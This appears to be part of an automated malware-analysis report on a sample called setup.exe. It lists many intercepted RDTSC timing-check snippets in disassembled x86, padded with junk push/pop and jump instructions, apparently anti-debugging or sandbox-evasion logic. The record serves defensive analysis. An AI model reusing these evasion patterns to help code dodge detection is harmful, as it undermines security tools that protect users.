Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EBA919 second address: EBA930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CFB71FEh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EBA930 second address: EBA938 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EBA938 second address: EBA971 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7208h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF32CFB7207h 0x0000000e jl 00007FF32CFB71F6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EB969A second address: EB96A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EB96A2 second address: EB96B6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF32CFB71F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FF32CFB71F6h 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EC245C second address: EC2462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EC2462 second address: EC2474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jbe 00007FF32CFB71F8h 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EC2474 second address: EC2481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EC2481 second address: EC2487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EC2487 second address: EC248B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EC2151 second address: EC2185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 jmp 00007FF32CFB7203h 0x0000000b pop esi 0x0000000c popad 0x0000000d jne 00007FF32CFB7218h 0x00000013 pushad 0x00000014 push eax 0x00000015 pop eax 0x00000016 jmp 00007FF32CFB71FEh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: ECF1E5 second address: ECF1F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jng 00007FF32CDD6566h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: ED1BC8 second address: ED1BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF32CFB71FDh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: ED1BE0 second address: ED1BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: ED1BE4 second address: ED1BE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EE51EB second address: EE51EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EE51EF second address: EE520B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7205h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EE520B second address: EE5216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EE503D second address: EE5046 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EE5046 second address: EE506F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CDD6571h 0x00000009 jno 00007FF32CDD6566h 0x0000000f jmp 00007FF32CDD656Dh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EE506F second address: EE5074 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EE5074 second address: EE507C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EE7A01 second address: EE7A0C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jne 00007FF32CFB71F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EE917C second address: EE9195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CDD6573h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EE9195 second address: EE919A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EE919A second address: EE91DB instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF32CDD6568h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jne 00007FF32CDD656Eh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 jmp 00007FF32CDD6579h 0x0000001a pop edi 0x0000001b pushad 0x0000001c push edi 0x0000001d pop edi 0x0000001e ja 00007FF32CDD6566h 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EE91DB second address: EE91E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EE91E0 second address: EE9203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CDD656Bh 0x00000009 jmp 00007FF32CDD6572h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EEB71F second address: EEB72E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007FF32CFB71F6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EEB72E second address: EEB734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EEB734 second address: EEB73F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EF1A0D second address: EF1A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EF1A11 second address: EF1A1D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF32CFB71F6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EF0376 second address: EF037C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EF0635 second address: EF063B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EF063B second address: EF0657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF32CDD6576h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EF0657 second address: EF0675 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7209h 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EF07C1 second address: EF0801 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF32CDD6566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007FF32CDD6574h 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 push edi 0x00000017 pop edi 0x00000018 pop esi 0x00000019 jng 00007FF32CDD6578h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EF0984 second address: EF099E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007FF32CFB71FFh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EF099E second address: EF09A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EF0C3A second address: EF0C53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FF32CFB7201h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EF523E second address: EF5250 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF32CDD6566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007FF32CDD656Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EF5250 second address: EF5254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EF5254 second address: EF5259 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EF5259 second address: EF5278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CFB7209h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F13EC0 second address: F13ECC instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF32CDD6566h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F13ECC second address: F13ED1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F31818 second address: F3181C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F3181C second address: F3182E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF32CFB71F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FF32CFB71F6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F3182E second address: F31840 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F31840 second address: F31844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F31F56 second address: F31F5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F320D9 second address: F320F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CFB7203h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F320F7 second address: F320FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F320FB second address: F32121 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF32CFB71F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007FF32CFB7209h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F33F1C second address: F33F24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F36AFF second address: F36B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D70A27 second address: 4D70A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D70A2B second address: 4D70A31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D70A31 second address: 4D70AF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF32CDD6578h 0x00000009 adc cx, F1F8h 0x0000000e jmp 00007FF32CDD656Bh 0x00000013 popfd 0x00000014 jmp 00007FF32CDD6578h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c je 00007FF39F40BE90h 0x00000022 pushad 0x00000023 jmp 00007FF32CDD656Eh 0x00000028 push esi 0x00000029 mov ecx, edx 0x0000002b pop edx 0x0000002c popad 0x0000002d test byte ptr [77436968h], 00000002h 0x00000034 jmp 00007FF32CDD6578h 0x00000039 jne 00007FF39F40BE6Ah 0x0000003f jmp 00007FF32CDD6570h 0x00000044 mov edx, dword ptr [ebp+0Ch] 0x00000047 jmp 00007FF32CDD6570h 0x0000004c xchg eax, ebx 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FF32CDD6577h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D70AF5 second address: 4D70B91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c mov ah, 71h 0x0000000e pop edi 0x0000000f pushfd 0x00000010 jmp 00007FF32CFB7204h 0x00000015 or cl, 00000038h 0x00000018 jmp 00007FF32CFB71FBh 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ebx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FF32CFB7204h 0x00000027 xor esi, 6FA05A98h 0x0000002d jmp 00007FF32CFB71FBh 0x00000032 popfd 0x00000033 push eax 0x00000034 push edx 0x00000035 pushfd 0x00000036 jmp 00007FF32CFB7206h 0x0000003b sub eax, 7A5D04F8h 0x00000041 jmp 00007FF32CFB71FBh 0x00000046 popfd 0x00000047 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D70B91 second address: 4D70BD8 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF32CDD6578h 0x00000008 and si, 5F58h 0x0000000d jmp 00007FF32CDD656Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FF32CDD6575h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D70BD8 second address: 4D70BE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CFB71FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D70BE8 second address: 4D70BFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov bx, cx 0x0000000d push eax 0x0000000e push edx 0x0000000f movzx esi, di 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D70BFA second address: 4D70C06 instructions: 0x00000000 rdtsc 0x00000002 mov eax, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebx 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D70C06 second address: 4D70C49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop eax 0x00000006 popad 0x00000007 pushfd 0x00000008 jmp 00007FF32CDD656Bh 0x0000000d and al, FFFFFFDEh 0x00000010 jmp 00007FF32CDD6579h 0x00000015 popfd 0x00000016 popad 0x00000017 push dword ptr [ebp+14h] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF32CDD656Dh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D70C75 second address: 4D70C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D70C79 second address: 4D70C95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6578h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D70C95 second address: 4D70CBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF32CFB7205h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D70CBC second address: 4D70CFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6571h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a jmp 00007FF32CDD656Eh 0x0000000f mov esp, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF32CDD6577h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D80D7D second address: 4D80D8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D80D8C second address: 4D80DE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, F0h 0x00000005 pushfd 0x00000006 jmp 00007FF32CDD6570h 0x0000000b adc ecx, 6D1D8CD8h 0x00000011 jmp 00007FF32CDD656Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FF32CDD6574h 0x00000022 xor ch, 00000038h 0x00000025 jmp 00007FF32CDD656Bh 0x0000002a popfd 0x0000002b mov edi, ecx 0x0000002d popad 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov bx, 3280h 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D80AD7 second address: 4D80ADD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D80ADD second address: 4D80B01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6577h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D80B01 second address: 4D80B05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D80B05 second address: 4D80B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D80B0B second address: 4D80B52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF32CFB7203h 0x00000008 pop ecx 0x00000009 mov cx, bx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FF32CFB71FCh 0x00000019 jmp 00007FF32CFB7205h 0x0000001e popfd 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D80B52 second address: 4D80B94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6577h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FF32CDD6576h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FF32CDD656Ah 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D80B94 second address: 4D80B9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4E0073D second address: 4E00765 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF32CDD656Bh 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF32CDD6570h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DF09EF second address: 4DF09F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DF09F3 second address: 4DF0A10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6579h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DF0A10 second address: 4DF0A16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DF0A16 second address: 4DF0A1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DF0A1A second address: 4DF0A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DF0A28 second address: 4DF0A2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DF0A2E second address: 4DF0A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DF0A32 second address: 4DF0A36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DF080B second address: 4DF0848 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF32CFB71FEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF32CFB71FEh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4DF0848 second address: 4DF085A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CDD656Eh 0x00000009 rdtsc
